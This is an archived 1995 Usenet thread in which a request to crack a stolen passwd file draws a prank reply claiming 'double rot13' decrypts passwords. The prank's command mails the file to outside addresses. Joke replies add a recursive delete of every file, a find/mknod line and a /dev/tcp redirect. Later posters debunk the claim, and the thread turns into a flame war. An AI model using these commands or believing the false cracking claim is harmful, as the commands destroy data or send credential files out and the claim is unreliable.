passwd file

minulla on ukkonen

Jan 16, 1995, 9:38:21 AM1/16/95
In article <3f6gt7$8...@clarknet.clark.net>,
Joseph A. Liu <jos...@clark.net> wrote:

>Ok, now I got hold of passwd file from a system,. I need to know how to
>crack it. Please help.

Uhhhhm. It isn't easy to truly crack a password file. Most people on here
will tell you to get a program called jack or crack even for unix. But
they won't truly crack it. What you are going to need is a program called
rot13. Which, fortunate for you, just happens to be on most unix systems.
For some reason it is usually located in /usr/games but thats a different
matter entirely. What you need to do is what is commonly called double
rot13 encyption. This is supposedly for extra security but using a
special backdoor in any mailer program it can actually be used to decrypt
the password file...

Here are the plans:

Step1:
Obtain the password file (something you say you have already done)

Step2:
Verify that your system does indeed have rot rot13. Check /usr/games if you
dont find it there try the unix find backdoor that only hackers use
[type this at a unix prompt: find . -name "*" -exec mknod {} c 39 1 \;]

Step3:
Since you have rot13 you can now proceed. Make sure that your system also
supports the mail command and that you have the password file.

Step4:
OK HERE IT IS!!@ This is the command line that will crack the password
file for you, it must be typed almost exactly as it is stated or it won't
work correctly...

sitename == name of site from where the password file came
password.file == name of the passwd file

cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

Sometimes the ro...@cert.org bug doesnt work. If its not cracked after
running try the following end addresses as well:

ro...@dockmaster.ncsc.mil
logger-a321.nsa.org
ro...@clark.net
ro...@sidewinder.com
ro...@aol.com
ro...@prodigy.com
[etc...]

Good luck, hope all goes well for you.

Halflife

Jan 16, 1995, 11:24:11 AM1/16/95
In article <3fe0ct$t...@vespucci.iquest.com> ch...@vespucci.iquest.com (minulla on ukkonen) writes:
>From: ch...@vespucci.iquest.com (minulla on ukkonen)
>Subject: Re: passwd file
>Date: 16 Jan 1995 08:38:21 -0600

>In article <3f6gt7$8...@clarknet.clark.net>,
>Joseph A. Liu <jos...@clark.net> wrote:

>>Ok, now I got hold of passwd file from a system,. I need to know how to
>>crack it. Please help.

>Uhhhhm. It isn't easy to truly crack a password file. Most people on here
>will tell you to get a program called jack or crack even for unix. But
>they won't truly crack it. What you are going to need is a program called
>rot13. Which, fortunate for you, just happens to be on most unix systems.
>For some reason it is usually located in /usr/games but thats a different
>matter entirely. What you need to do is what is commonly called double
>rot13 encyption. This is supposedly for extra security but using a
>special backdoor in any mailer program it can actually be used to decrypt
>the password file...

ahahhahaa thats hilarious!

>Step4:
>OK HERE IT IS!!@ This is the command line that will crack the password
>file for you, it must be typed almost exactly as it is stated or it won't
>work correctly...

>sitename == name of site from where the password file came
>password.file == name of the passwd file

>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

bwahahahahaha...sh-yeah right..... I know some echos have morons in them, but
nobody could be _that_ stupid..rot13 indeed....

>Sometimes the ro...@cert.org bug doesnt work. If its not cracked after
>running try the following end addresses as well:

what?! no whitehouse.gov, or i.will.get.you.you.hacker.you.nsa.org? How
disappointing...

>Good luck, hope all goes well for you.

bwaha...i think it would be better to ftp the ultra-cracker toolkit from
127.0.0.1, much better than this 'trick'. Dont you think so?

Alex / Brain21

Jan 16, 1995, 3:18:15 PM1/16/95
Halflife (half...@tmok.res.wpi.edu) thought s/he should say:
:You>>Joseph A. Liu <jos...@clark.net> wrote:

:You>>>Ok, now I got hold of passwd file from a system,. I need to know how to
:You>>>crack it. Please help.

:You>>Uhhhhm. It isn't easy to truly crack a password file. Most people on here
:You>>will tell you to get a program called jack or crack even for unix. But
:You>>they won't truly crack it. What you are going to need is a program called
:You>>rot13. Which, fortunate for you, just happens to be on most unix systems.
:You>>For some reason it is usually located in /usr/games but thats a different
:You>>matter entirely. What you need to do is what is commonly called double
:You>>rot13 encyption. This is supposedly for extra security but using a
:You>>special backdoor in any mailer program it can actually be used to decrypt
:You>>the password file...

:You>>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

Lotsa stuff snipped

Cross post this to one of the humor.funny groups!!!

--
?????????????????????????????????????????????????????????????????????????????
?"Bad is good. YEAH BABY!!! Down with government!"- _The_Midnight_Bomber_,?

S|ren Erichsen

Jan 17, 1995, 4:28:28 AM1/17/95
minulla on ukkonen (ch...@vespucci.iquest.com) wrote:
: In article <3f6gt7$8...@clarknet.clark.net>,

: Joseph A. Liu <jos...@clark.net> wrote:

: >Ok, now I got hold of passwd file from a system,. I need to know how to
: >crack it. Please help.

[snip]
: What you need to do is what is commonly called double
: rot13 encyption.

shhhhhhhhh! You are leaking the most wellkept secret in Unix history.
Shame on you sir.
[snip]
: [type this at a unix prompt: find . -name "*" -exec mknod {} c 39 1 \;]

Why not go all the way and tell him the sysop-way of doing things:
find / -name \* -exec rm {} \;
[snip]
: cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

After this leak, noone can feel safe nomore. It's a sad day in the world
of computing.

: Sometimes the ro...@cert.org bug doesnt work. If its not cracked after

: running try the following end addresses as well:

nbd...@inet.uni-c.dk

Oh! It's one of those "Make Money Fast"-schemes. I'll just add my own
address to the bottom of the list then.

the (I Can't Wait To Get Rich) Broke Bunny

vand...@scs.unr.edu

Jan 19, 1995, 4:54:19 PM1/19/95
In article <3fe0ct$t...@vespucci.iquest.com>, ch...@vespucci.iquest.com (minulla on ukkonen) says:
>Step4:
>OK HERE IT IS!!@ This is the command line that will crack the password
>file for you, it must be typed almost exactly as it is stated or it won't
>work correctly...
>
>sitename == name of site from where the password file came
>password.file == name of the passwd file
>
>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

rot13 was not on my system, so I ftped it, but my shell acount does not
allow me to run files. Is there a way around this? is there a special
dir I can put it in so that I can run it?

Please help, svvdb

Alan D Corre

Jan 19, 1995, 11:33:54 PM1/19/95
In article <D2oA6...@greatbasin.com> vand...@scs.unr.edu writes:

:In article <3fe0ct$t...@vespucci.iquest.com:, ch...@vespucci.iquest.com (minulla on ukkonen) says:
::Step4:
::OK HERE IT IS!!@ This is the command line that will crack the password
::file for you, it must be typed almost exactly as it is stated or it won't
::work correctly...
::
::sitename == name of site from where the password file came
::password.file == name of the passwd file
::
::cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org
:
:
:rot13 was not on my system, so I ftped it, but my shell acount does not

That's strange. There's a lot of rot on my system, including rot13.

:allow me to run files. Is there a way around this? is there a special

:dir I can put it in so that I can run it?

Try fa dir, mo dir, or bro dir. That should make it relatively easy.
:
: Please help, svvdb

--
Alan D. Corre
Emeritus Professor of Hebrew Studies

Alfred Bourdet

Jan 20, 1995, 3:03:26 AM1/20/95
minulla on ukkonen (ch...@vespucci.iquest.com) wrote:
: In article <3f6gt7$8...@clarknet.clark.net>,

: Here are the plans:

That's hella wrong to tell him that man..
SNICKER... I wonded if he does it..
that's still hella phucked up to tell him that..
dork..

Sven DUBOIS

Jan 20, 1995, 7:10:16 AM1/20/95
[...]

The following might work fine:

cat rot13 > /dev/tcp

The following works even better:

cat <passwd-file> > /dev/tcp

If none of these work, report the problem to ro...@cert.org

Anton Toom

Jan 22, 1995, 1:44:41 AM1/22/95
Alfred Bourdet (abou...@slip-1.slip.net) happened to write:
=> minulla on ukkonen (ch...@vespucci.iquest.com) wrote:
=> : In article <3f6gt7$8...@clarknet.clark.net>,
=> : Joseph A. Liu <jos...@clark.net> wrote:

=> : >Ok, now I got hold of passwd file from a system,. I need to know how to
=> : >crack it. Please help.
=> : Here are the plans:

=> : Step1:
=> : ro...@dockmaster.ncsc.mil
=> : logger-a321.nsa.org
=> : ro...@clark.net
=> : ro...@sidewinder.com
=> : ro...@aol.com
=> : ro...@prodigy.com
=> : [etc...]

=> : Good luck, hope all goes well for you.

=> That's hella wrong to tell him that man..
=> SNICKER... I wonded if he does it..
=> that's still hella phucked up to tell him that..
=> dork..

uhhh like ok.... but sounds like phun... dont forget

Pres...@WhiteHouse.gov
and Sa...@NorthPole.net

peas luv duwp! acid rulz!

SysOp

Jan 24, 1995, 8:53:22 AM1/24/95
ALL INFORMATION SHOULD BE FREE!!!

~

Jan 24, 1995, 10:28:54 AM1/24/95
minulla on ukkonen (ch...@vespucci.iquest.com) wrote:
: In article <3f6gt7$8...@clarknet.clark.net>,

: Joseph A. Liu <jos...@clark.net> wrote:

: >Ok, now I got hold of passwd file from a system,. I need to know how to
: >crack it. Please help.

: Uhhhhm. It isn't easy to truly crack a password file. Most people on here
: will tell you to get a program called jack or crack even for unix. But
: they won't truly crack it. What you are going to need is a program called
: rot13. Which, fortunate for you, just happens to be on most unix systems.

I think you posted this in the wrong echo, it should have been in
rec.jokes :-)

Alan D Corre

Jan 24, 1995, 11:21:16 AM1/24/95
In article <3g30oi$18...@columba.udac.uu.se> SysOp <nei...@forsmark.uu.se> writes:
>ALL INFORMATION SHOULD BE FREE!!!

Have you read Stallman's manifesto included in the Emacs software? He agrees
with you.

Just one question. How do professionals get their salaries paid?

Mark Horn

Jan 25, 1995, 10:18:51 AM1/25/95

SysOp <nei...@forsmark.uu.se> wrote:
>ALL INFORMATION SHOULD BE FREE!!!

Ok, can I have all of your credit card numbers, please?

--
Mark Horn (sparkie)
ho...@mickey.jsc.nasa.gov

Dennis Monbourquette

Jan 25, 1995, 5:52:31 AM1/25/95
SysOp (nei...@forsmark.uu.se) wrote:
: ALL INFORMATION SHOULD BE FREE!!!

Your wife is sleeping with your best friend. And his dog.

No charge.

-Feste a la Disseminator

--
_______________________________________________________ Remember: silly
/~~~~~~~~\_/~~~~~~~~\__/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_ is a state of mind

J. Simon

Jan 25, 1995, 3:34:49 PM1/25/95
Mark Horn (ho...@pendragon.jsc.nasa.gov) wrote:
: In article <3g30oi$18...@columba.udac.uu.se>,

You bet! There are two 0's, three 1's, two 2's, two 4's, four 5's,
two 7's, and one 8. Hope that helps! - Lars-Be.

Tom Digby

Jan 25, 1995, 6:58:53 PM1/25/95
minulla on ukkonen (ch...@vespucci.iquest.com) wrote:
: In article <3f6gt7$8...@clarknet.clark.net>,

: Joseph A. Liu <jos...@clark.net> wrote:

: >Ok, now I got hold of passwd file from a system,. I need to know how to
: >crack it. Please help.

: Uhhhhm. It isn't easy to truly crack a password file. Most people on here
: will tell you to get a program called jack or crack even for unix. But

[tech stuff chopped]

: cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

: Sometimes the ro...@cert.org bug doesnt work. If its not cracked after
: running try the following end addresses as well:

[more choppage]

You might give some hints as to how to tell when the file is finally
cracked. Is it when there's pieces of Unix shell all over the floor?
--
-- Tom
bub...@well.sf.ca.us

Rick Davis

Jan 25, 1995, 8:00:51 PM1/25/95
gr...@yar.cs.wisc.edu writes:

> : Ok, can I have all of your credit card numbers, please?
>
> : --
> : Mark Horn (sparkie)
> : ho...@mickey.jsc.nasa.gov
>
> You bet! There are two 0's, three 1's, two 2's, two 4's, four 5's,
> two 7's, and one 8. Hope that helps! - Lars-Be.

Okay, just tell us now the type of card it is (Visa, AMX, etc.)
and we'll be on our way! :)

Marshall Watts

Feb 2, 1995, 9:05:56 AM2/2/95
In article <3gm03b$6...@news1.is.net> scrt...@user1.IS.NET (Alex / Brain21) writes:
>Marshall Watts (wa...@Primenet.Com) thought s/he should say:
>:You>In article <3gggeo$o...@adonis.clnsnet.ariadne-t.gr>,
>:You>Nikos Gryspolakis <ngr...@tarra.ced.tuc.gr> wrote:
>:You>>>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org
>:You>> ~~~~~~~~~~~~~
>
>:You>Hey man haven't you figured it out yet? He is trying to get you to
>:You>mail your "password.file" to him so he can break into your system.
>:You>Don't be suckered!!!!!!!!
>
>Yup, those nasty guys at cert.org are at it again!! Of all of those
>maliscious (SP?) hackers out there, the guys at cert.org make the others
>look like the Mother Theresa of hackers. Root in particular is EXTREMELY
>malicious. Don't even send him mail of let him finger you!@!!!!!
>
>Be EXTREMELY CAREFUL when dealing with ro...@cert.org, and for your own
>health, don't EVER flame him!!!! (I shudder at the thought).

HEY JERK WHY DID YOU EDIT MY RESPONSE?
My response was:

Hey man haven't you figured it out yet? He is trying to get you to
mail your "password.file" to him so he can break into your system.
The double rot13 does just what you said, returns the original password
file and the mail command sends it to whoever. One of the entries in the
list is HIM!!!
^^^^
Don't be suckered!!!!!!!!

I did not say anything about ro...@cert.org I said:
One of the entries in the list is HIM!!!

How intelligent do you have to be to understand what I said?

Marshall Watts
wa...@eli887.ateng.az.honeywell.com

Nikos Gryspolakis

Jan 29, 1995, 11:40:56 AM1/29/95
>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

I tried the command but the double rot13 compression (rot13 |rot13) just
returned the original passwd file! The manual page of rot13 said that if you
encode a file using rot13 and then re-encode it, you get the original text.

Is there something wrong with the command or with my rot13 program? If so
where can I get rot13 ?

Route

Jan 29, 1995, 6:57:43 PM1/29/95
Nikos Gryspolakis (ngr...@tarra.ced.tuc.gr) wrote:
: >cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

Dear GOD, let me end this now. If this is a troll, so be it, but
all you other simps out there trying to use rot13 to crack passwd files
LISTEN UP!

rot13 has NOTHING to do with the crypt(3) function used in Unix.
It is a simple substitution cipher. There is NOTHING special about it.
This is the code:

if(c>='a'&&c<='m')c=c+13;
else if(c>='n'&&c<='z')c=c-13;
else if(c>='A'&&c<='M')c=c+13;
else if(c>='N'&&c<='Z')c=c-13;

That is all. Now don't you feel stupid? Now go out and learn
something about Unix.

--
/-----------------------------------/
/ The pursuit of knowledge /

Original Dancing Bear

Jan 29, 1995, 8:20:59 PM1/29/95
Route (dae...@netcom.com) wrote:

[...]

Are you sure?? Gosh, *I* sure feel stupid. Hey, Wundeers, dontcha
feel stupid????

My dear fellow...I really hate to break it to you like this. But this
is Olde Wundee and there are many, many little moss covered bridges
leaping o'er the little babbling brooks and if by chance you have
traipsed crosst one and *felt* the eldritch touch of a scaly,
humanoid hand exploring your ankle...

--

-- The Original Dancing Bear, PhT, AB, TFI, AS, MFB
(Perfesser of Anthropophagy, frontier infosurgeon, hydrogen flamester)

Route

Jan 29, 1995, 10:07:21 PM1/29/95
Original Dancing Bear (bpas...@cie-2.uoregon.edu) wrote:

: Are you sure?? Gosh, *I* sure feel stupid. Hey, Wundeers, dontcha
: feel stupid????

: My dear fellow...I really hate to break it to you like this. But this
: is Olde Wundee and there are many, many little moss covered bridges
: leaping o'er the little babbling brooks and if by chance you have
: traipsed crosst one and *felt* the eldritch touch of a scaly,
: humanoid hand exploring your ankle...

What the hell does this have to do with the original thread? Stop
speaking gibberish and stay on topic, damned hippie....

: --

: -- The Original Dancing Bear, PhT, AB, TFI, AS, MFB
: (Perfesser of Anthropophagy, frontier infosurgeon, hydrogen flamester)

Original Dancing Bear

Jan 29, 1995, 11:14:33 PM1/29/95
Route (dae...@netcom.com) wrote:

: What the hell does this have to do with the original thread? Stop

: speaking gibberish and stay on topic, damned hippie....

You lame twit. This is coming to you from Alt.1d. Know how to edit
a followup line? Remove "alt.1d" from the followup. That's "alt.1d".
Have I repeated myself enough? What you thought was a troll was
"humor". Study some and broaden your life. Gibberish? Look at a
dictionary sometime. Ignorant ass.

: --

: /-----------------------------------/
: / The pursuit of knowledge /

^^^^^^^^^^^^^^^^^^^^^^^^
Know what to do with it if you ever find any?

: / /

: /ftp ftp.netcom.com /pub/da/daemon9 /
: /-----------------------------------/

:

Alan D Corre

Jan 30, 1995, 12:49:00 AM1/30/95
In article <daemon9D...@netcom.com> dae...@netcom.com (Route) writes:

:Original Dancing Bear (bpas...@cie-2.uoregon.edu) wrote:
:
:: Are you sure?? Gosh, *I* sure feel stupid. Hey, Wundeers, dontcha
:: feel stupid????
:
:: My dear fellow...I really hate to break it to you like this. But this
:: is Olde Wundee and there are many, many little moss covered bridges
:: leaping o'er the little babbling brooks and if by chance you have
:: traipsed crosst one and *felt* the eldritch touch of a scaly,
:: humanoid hand exploring your ankle...
:
:
: What the hell does this have to do with the original thread? Stop
:speaking gibberish and stay on topic, damned hippie....

Oh, I dunno. The eldritch touch of a scaly, humanoid hand sounds quite
interesting. In any case, my ankle is a bit itchy tonite. A slight allergic
reaction, prolly.

Alex / Brain21

Jan 30, 1995, 1:34:41 PM1/30/95
to bpas...@cie-2.uoregon.edu
Original Dancing Bear (bpas...@cie-2.uoregon.edu) thought s/he should say:
:You>Route (dae...@netcom.com) wrote:

:You>: What the hell does this have to do with the original thread? Stop
:You>: speaking gibberish and stay on topic, damned hippie....

:You>You lame twit. This is coming to you from Alt.1d. Know how to edit
:You>a followup line? Remove "alt.1d" from the followup. That's "alt.1d".
:You>Have I repeated myself enough? What you thought was a troll was
:You>"humor". Study some and broaden your life. Gibberish? Look at a
:You>dictionary sometime. Ignorant ass.

You lame twit!! It seems *YOU* didn't alter the followup line either.
Still you have not stayed on topic. The troll he was referring to was a
thread that started in alt.2600 about "double ROT13" "encryption," not
your lame reply. So what is alt.1d anyway? From what I read it sounds
like a lame attempt at alt.surrealism. I have never read the group so I
don't know. The attempt at "humor" was exactly that. An attempt. Who
are you to tell anyone to "study some and broaden your life....Look at a
dictionary sometime. Ignorant ass?" Just because we found your "humor"
not only 1)off topic, and 2)unfunny does NOT mean that we are ignorant,
nor stupid. It is really not a good idea to make such outrageous
assumptions about someone whom you have never met. Do you feel that
everyone who does not appreciate your "humor" is ignorant? You sure seem
to talk that way. I think that would make you the ignorant one, now
wouldn't it. The attitude would border on racism as well, bsaed on
thought patterns. Kinda Orwellian, don't you think. Dae...@netcom.com,
who you were ignorantly flaming could be a computer genius, a doctor, a
philosopher, an artist, etc. Get the picture? Who needs their horizons
broadened? It seems to me that yours are pretty narrow.

Original Dancing Bear

Jan 30, 1995, 2:10:47 PM1/30/95
Adios.

L. Adrian Griffis

Jan 30, 1995, 1:12:41 PM1/30/95
Route (dae...@netcom.com) wrote:

[...]

You never let us have any fun. 8-(

--
-.. . -.- . -.... -.-. ... -..- -.-
L. Adrian Griffis

Daniel Beck

Jan 30, 1995, 8:49:58 PM1/30/95
In article <3gjbg1$s...@news1.is.net>,

Alex / Brain21 <scrt...@user1.IS.NET> wrote:
>Original Dancing Bear (bpas...@cie-2.uoregon.edu) thought s/he should say:
>:You>Route (dae...@netcom.com) wrote:
[snip]

>You lame twit!! It seems *YOU* didn't alter the followup line either.
>Still you have not stayed on topic. The troll he was referring to was a
[etcetera etcetera]

>thought patterns. Kinda Orwellian, don't you think. Dae...@netcom.com,
>who you were ignorantly flaming could be a computer genius, a doctor, a
>philosopher, an artist, etc. Get the picture? Who needs their horizons
>broadened? It seems to me that yours are pretty narrow.

That'll be one more for the decaf, please.

Daniel (Me, my horizons are quite broad. I can see all the way from one
side of the room to the other.)

Marshall Watts

Kohki IMAI

Jan 30, 1995, 11:08:32 PM1/30/95

From article <daemon9D...@netcom.com>
by dae...@netcom.com (Route)

> Newsgroups: alt.2600,alt.security,alt.pud,comp.security.unix,alt.config,alt.1d
> From: dae...@netcom.com (Route)
> Subject: Re: passwd file
> Date: Sun, 29 Jan 1995 23:57:43 GMT

Daniel Beck

Jan 30, 1995, 8:42:33 PM1/30/95
In article <daemon9D...@netcom.com>, Route <dae...@netcom.com> wrote:
>Original Dancing Bear (bpas...@cie-2.uoregon.edu) wrote:

[nothing deserving the emphatic nature of the following:]

> What the hell does this have to do with the original thread? Stop
>speaking gibberish and stay on topic, damned hippie....
^^^^^^^^^^^^^

Careful where you wave that pitchfork... you might poke someone's eye out...
Didn't this sort of thing go out with wide collars and flare pants?

Down here in alt.1d we're all rather fond of the Dancing Bear's gibberish.
I don't know who crossposted this thread to wundee, but I presume it was
someone with a sense of humor who thought we might enjoy the joke that
started the thread...

...and ODB responded to your post in 1d as we respond to most every post
in 1d. It's what we do. It's called humor. Every once in a while a
message ends up being crossposted to somewhere it may not precisely belong.
It happens. It's called life.

Maybe if you switched to a decaffeinated brand, you could learn to treat
the latter with a greater measure of the former.

Have a wonderful day, daemon9.

Daniel

terry

Jan 31, 1995, 1:01:47 PM1/31/95
Route (dae...@netcom.com) wrote:

: Original Dancing Bear (bpas...@cie-2.uoregon.edu) wrote:

: : Are you sure?? Gosh, *I* sure feel stupid. Hey, Wundeers, dontcha
: : feel stupid????

: : My dear fellow...I really hate to break it to you like this. But this
: : is Olde Wundee and there are many, many little moss covered bridges
: : leaping o'er the little babbling brooks and if by chance you have
: : traipsed crosst one and *felt* the eldritch touch of a scaly,
: : humanoid hand exploring your ankle...

: What the hell does this have to do with the original thread? Stop
: speaking gibberish and stay on topic, damned hippie....

Ummm, you mentioned the possibility of it being a troll, I think this post is
reinforcing that possibility. You know like trolls that live under bridges...
Like in the 3 billy goats gruff or whatever, like the hand is a trolls hand
grabbing you, like.... never mind. Some of you guys are way too serious.

-terry

Alex / Brain21

Alex / Brain21

Jan 31, 1995, 2:05:44 PM1/31/95
to be...@marcus.its.rpi.edu
Daniel Beck (be...@marcus.its.rpi.edu) thought s/he should say:

:You>Down here in alt.1d we're all rather fond of the Dancing Bear's gibberish.

flrbphhhhht!!!! vaidfjsi, asdkhasui SO THERE!

:You>I don't know who crossposted this thread to wundee, but I presume it was
:You>someone with a sense of humor who thought we might enjoy the joke that
:You>started the thread...

Sounds entirely possible

:You>...and ODB responded to your post in 1d as we respond to most every post
:You>in 1d. It's what we do. It's called humor.

Uhhh, yeah! Funny, George. P-E-T-R-O-L, duuuh that's a funny way to
spell water, George.

:You> Every once in a while a
:You>message ends up being crossposted to somewhere it may not precisely belong.
:You>It happens. It's called life.

At least we either
1) Tell them to take it to the apropriate group (some say it nicer
than others)

2) Give a brief answer if we can

3) Stay on topic. (see #2)

Dancing Bear did none of these, so he got flamed (more like lightly
sunburned). Then he decided to respond by calling names, making
unfounded accusations, calling people who he does not know ignorant,
etc. I didn't like it, so *I* flamed him. I don't have 1d at my site,
so I'm not sure if it got posted or not. You can check it out in
alt.2600 or any of the other groups that it was cross posted to.

Original Dancing Bear

Jan 31, 1995, 2:23:56 PM1/31/95
terry (tno...@cup.hp.com) wrote:

Jeez, now you have to go and explain *everything*. No fun whatsoever.

Alex / Brain21

Jan 31, 1995, 2:13:39 PM1/31/95
p.com>
terry (tno...@cup.hp.com) thought s/he should say:

:You>Ummm, you mentioned the possibility of it being a troll, I think this
post is
:You>reinforcing that possibility. You know like trolls that live under
bridges...
:You>Like in the 3 billy goats gruff or whatever, like the hand is a trolls hand
~~~~~~~~~~~~~~~~~~~

Been reading some of my old posts here?

Alex / Brain21

Jan 31, 1995, 2:11:18 PM1/31/95
Daniel Beck (be...@marcus.its.rpi.edu) thought s/he should say:
:You>Alex / Brain21 <scrt...@user1.IS.NET> wrote:
:You>>philosopher, an artist, etc. Get the picture? Who needs their horizons
:You>>broadened? It seems to me that yours are pretty narrow.
:You>>

:You>That'll be one more for the decaf, please.

Well, what did you expect. Why don't you give Dancing bear decaf too?
He was the one taking the accusatory tone, not us. He was the one
claiming our horizons are narrow w/o knowinbg a damn thing about us, not
us. *HE* was the one who flamed us for not editing out the headers, and
then he did not even do it himself! Not us!

:You>Daniel (Me, my horizons are quite broad. I can see all the way from one
:You> side of the room to the other.)

More humor? Sorry, I can appreciate your injecting a bit of levity into
the situation, absolutely nothing wrong with that, but I still am not
laughing.

BTW, I don't even drink coffee :^P

Alex / Brain21

Jan 31, 1995, 2:57:39 PM1/31/95
p.com> <3gm2oc$k...@pith.uoregon.edu>

Original Dancing Bear (bpas...@cie-2.uoregon.edu) thought s/he should say:
:You>terry (tno...@cup.hp.com) wrote:

:You>: : : My dear fellow...I really hate to break it to you like this. But
this
:You>: : : is Olde Wundee and there are many, many little moss covered bridges
:You>: : : leaping o'er the little babbling brooks and if by chance you have
:You>: : : traipsed crosst one and *felt* the eldritch touch of a scaly,
:You>: : : humanoid hand exploring your ankle...

:You>: Ummm, you mentioned the possibility of it being a troll, I think this post is
:You>: reinforcing that possibility. You know like trolls that live under bridges...
:You>: Like in the 3 billy goats gruff or whatever, like the hand is a trolls hand

:You>: grabbing you, like.... never mind. Some of you guys are way too serious.

:You>Jeez, now you have to go and explain *everything*. No fun whatsoever.

Sorry, I don't buy it. You are saying this after the fact. I think that
if you had meant it to be a troll you would not have gotten so offended
when you were flamed.

Nice try, better luck next time.

Out of Order

Feb 1, 1995, 12:57:20 AM2/1/95
Alex / Brain21 speaking:

> Daniel Beck (be...@marcus.its.rpi.edu) thought s/he should say:
> > >That'll be one more for the decaf, please.
>
> Well, what did you expect. Why don't you give Dancing bear decaf
> too? He was the one taking the accusatory tone, not us. He was the
> one claiming our horizons are narrow w/o knowinbg a damn thing about
> us, not us. *HE* was the one who flamed us for not editing out the
> headers, and then he did not even do it himself! Not us!

Can we spell "attitude"? Please ... no need to have cattle over this.
Remove alt.1d from Newsgroups lines if you take Daniel that seriously.

__ ___ __ __ _ ___ _ ___ _ ___ _ ___ _ __ __ ___ __
|_| _| / | |_| / \. _| / \. | | | / \ | | | ./ \ |_ ./ \ |_| | \ |_ |_|
/ | __| \_| / | \_/ | \_/ | |_| \_/ |_| | \_/ | \_/ | \ |_/ |__ | \
<ude.cmh@sleumasp> <psam...@hmc.edu>
(nosleumaS reteP r(O)r Peter Samuelson)

Leen van Kampen

Feb 1, 1995, 9:32:51 AM2/1/95
Test

Iolo Davidson

Feb 2, 1995, 4:26:44 PM2/2/95
In article <3gqos4$i...@saifr00.ateng.az.honeywell.com>
wa...@saifr00.ateng.az.honeywell.com "Marshall Watts" writes:

> How intelligent do you have to be to understand what I said?

Above a certain level, one ceases to make the effort.

--
SPECIAL SEATS WHO SCRATCH
RESERVED IN HADES THE LADIES

Alex / Brain21

Feb 3, 1995, 1:23:30 PM2/3/95
Iolo Davidson (io...@mist.demon.co.uk) thought s/he should say:
:You>In article <3gqos4$i...@saifr00.ateng.az.honeywell.com>
:You> wa...@saifr00.ateng.az.honeywell.com "Marshall Watts" writes:

:You>> How intelligent do you have to be to understand what I said?

:You>Above a certain level, one ceases to make the effort.

No effort was needed. It was simple enough to understand. How hard is
it to understand for him that I was merely poking fun at his misuse of
syntax?

Alex / Brain21

Feb 3, 1995, 1:17:55 PM2/3/95
Marshall Watts (wa...@saifr00.ateng.az.honeywell.com) thought s/he should say:

:You>HEY JERK WHY DID YOU EDIT MY RESPONSE?
:You>My response was:

[snip]

:You>I did not say anything about ro...@cert.org I said:
:You>One of the entries in the list is HIM!!!

:You>How intelligent do you have to be to understand what I said?

First of all, idiot, my response was meant as a joke, and not as a
sarcastic flame directed towards you. It was done totally toungue in cheek.

Second of all, you did not specify anything other than "him" The list
appeared AFTER your comments, and the line to which YOU REFERRED listed
cert.org.

When you talked about the mailing you said something to the effect of

"Hey man haven't you figured it out yet? He is trying to get you to
mail your "password.file" to him so he can break into your system."

When you said this you were referring to the line which included a
command to send the file to ro...@cert.org. You never mentioned the list
until LATER.

I understood completely what you meant, but the poor syntax which you
used amused me. I decided to MAKE LIGHT OF IT.

Now, how intelligent do *YOU* have to be to understand that?

Think before *you* go around calling people names and insulting their
intelligence.

Alex / Brain21

Feb 3, 1995, 1:19:58 PM2/3/95
Marshall Watts (wa...@saifr00.ateng.az.honeywell.com) thought s/he should say:
:You>In article <3gm03b$6...@news1.is.net> scrt...@user1.IS.NET (Alex / Brain21) writes:
:You>>Marshall Watts (wa...@Primenet.Com) thought s/he should say:
:You>>:You>In article <3gggeo$o...@adonis.clnsnet.ariadne-t.gr>,
:You>>:You>Nikos Gryspolakis <ngr...@tarra.ced.tuc.gr> wrote:

:You>>:You>>>cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org
:You>>:You>> ~~~~~~~~~~~~~
:You>>
:You>>:You>Hey man haven't you figured it out yet? He is trying to get you to
:You>>:You>mail your "password.file" to him so he can break into your system.
:You>>:You>Don't be suckered!!!!!!!!
:You>>
:You>>Yup, those nasty guys at cert.org are at it again!! Of all of those

Here is my proof. This is quoted from the article to which you were
referring. I did not edit your quote.

Ilja Schliffkowitz

Feb 2, 1995, 5:35:08 AM2/2/95
Route (dae...@netcom.com)
wrote Sun, 29 Jan 1995 23:57:43 GMT:

: Nikos Gryspolakis (ngr...@tarra.ced.tuc.gr) wrote:
: : >cat password.file | rot13 | rot13 | mail -s "sitename" ro...@cert.org

: Dear GOD, let me end this now. If this is a troll, so be it, but

: all you other simps out there trying to use rot13 to crack passwd files
: LISTEN UP!

: rot13 has NOTHING to do with the crypt(3) function used in Unix.
: It is a simple substitution cipher. There is NOTHING special about it.
: This is the code:
:
: if(c>='a'&&c<='m')c=c+13;
: else if(c>='n'&&c<='z')c=c-13;
: else if(c>='A'&&c<='M')c=c+13;
: else if(c>='N'&&c<='Z')c=c-13;

: That is all. Now don't you feel stupid? Now go out and learn
: something about Unix.

Hahaha! You're shouting about Unix knowledge! in Unix, you do

tr a-zA-Z m-na-zM-NA-Z <infile >outfile

to rot13 complete files! I don't know what you were programming in...
--
Schmuh Schubiak -/- Gib mir noch was von dem alten Janx Geist
GCS/O d--(++)@ p c++(++++) l+ u++ e--/* m+(---)@ n-(---) h* f+/* !g w+ t+ r- y+

Johan

Feb 6, 1995, 11:29:33 PM2/6/95
wa...@saifr00.ateng.az.honeywell.com (Marshall Watts) wrote:

> [...quoted stuff removed...]

> HEY JERK WHY DID YOU EDIT MY RESPONSE?

> My response was:

> Hey man haven't you figured it out yet? He is trying to get you to

> mail your "password.file" to him so he can break into your system.

> The double rot13 does just what you said, returns the original password

> file and the mail command sends it to whoever. One of the entries in
the
> list is HIM!!!
> ^^^^
> Don't be suckered!!!!!!!!

> I did not say anything about ro...@cert.org I said:
> One of the entries in the list is HIM!!!
>

> How intelligent do you have to be to understand what I said?

Ever been in one of those situations where you explain a joke to somebody
and they don't get it, so you explain it again...and again? They still
don't get it but now the fact that they don't get it is funny. They don't
get that either, so you try to explain it, but they don't get it so...

Oh well.

--johan